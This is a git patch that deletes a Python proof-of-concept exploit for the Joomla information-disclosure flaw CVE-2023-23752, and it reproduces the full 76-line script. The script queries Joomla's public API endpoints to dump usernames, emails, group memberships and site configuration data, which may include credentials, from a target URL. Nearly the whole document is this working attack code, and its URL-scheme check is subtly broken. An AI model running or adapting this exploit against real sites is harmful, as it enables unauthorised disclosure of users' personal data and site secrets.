From 2f136f2a5f0f429c3c38893bf1e65530186550f5 Mon Sep 17 00:00:00 2001
From: 0xVoodoo <79277183+0xVoodoo@users.noreply.github.com>
Date: Thu, 30 Apr 2026 20:29:55 -0600
Subject: [PATCH] Delete CVE-2023-23752.py

---
 CVE-2023-23752.py | 76 -----------------------------------------------
 1 file changed, 76 deletions(-)
 delete mode 100644 CVE-2023-23752.py

diff --git a/CVE-2023-23752.py b/CVE-2023-23752.py
deleted file mode 100644
index bef468d..0000000
--- a/CVE-2023-23752.py
+++ /dev/null
@@ -1,76 +0,0 @@
-import requests
-import json
-import argparse
-
-class User:
-    def __init__(user, name, email, lastvisitDate, groupNames):
-        user.name = name
-        user.email = email
-        user.lastvisitDate = lastvisitDate
-        user.groupNames = groupNames
-    
-    def __str__(user):
-        return f"Username: {user.name}\nEmail: {user.email}\nLast Visit: {user.lastvisitDate}\nGroups: {user.groupNames}"
-
-def vulnCheck(tgt):
-    verUrl = tgt + "/administrator/manifests/files/joomla.xml"
-    verData = requests.get(verUrl)
-    if len(verData.text) == 0 or "404" in verData.text.lower() or "403" in verData.text.lower():
-        print("[-] Site does not appear to be vulnerable!")
-        raise SystemExit
-
-def getUsers(tgt):
-    usrUrl = tgt + "/api/index.php/v1/users?public=true"
-    usrData = requests.get(usrUrl)
-    if "404" in usrData.text.lower() or "403" in usrData.text.lower():
-        print("[-] Error fetching user data, site may not be vulnerable")
-        raise SystemExit
-    parsedUsrs = json.loads(usrData.text)
-    return parsedUsrs
-
-def parseUsers(usrData):
-    users = []
-    for user in usrData["data"]:
-        userAtribs = user["attributes"]
-        newUser = User(userAtribs["username"],
-                       userAtribs["email"],
-                       userAtribs["lastvisitDate"],
-                       userAtribs["group_names"] )
-        users.append(newUser)
-    return users
-
-def getConfig(tgt):
-    cfgUrl = tgt + "/api/index.php/v1/config/application?public=true"
-    cfgData = requests.get(cfgUrl)
-    if "404" in cfgData.text.lower() or "403" in cfgData.text.lower():
-        print("[-] Error fetching user data, site may not be vulnerable")
-        raise SystemExit
-    parsedCfg = json.loads(cfgData.text)
-    return parsedCfg
-
-    
-
-if __name__ == "__main__":
-    parser = argparse.ArgumentParser(prog='Joomla Info Disclosure CVE-2023-23752', description='This is a PoC for CVE-2023-23752, an information disclosure vulnerability in Joomla < 4.2.8', epilog='Written by 0xVoodo')
-    parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
-    args = parser.parse_args()
-
-    tgt = args.target.lower()
-
-    if tgt[4] != "http" and tgt[5] != "https":
-        print("[*] No URL schema specified, defaulting to HTTP")
-        tgt = "http://" + tgt
-
-    vulnCheck(tgt)
-
-    print(f"\n[+] User data found!") 
-    print("----------")
-    for user in parseUsers(getUsers(tgt)):
-        print(user)
-        print("----------")
-    
-    print(f"\n[+] Config data found!")
-    print("----------")
-    for i in getConfig(tgt)["data"]:
-        print(i["attributes"])
-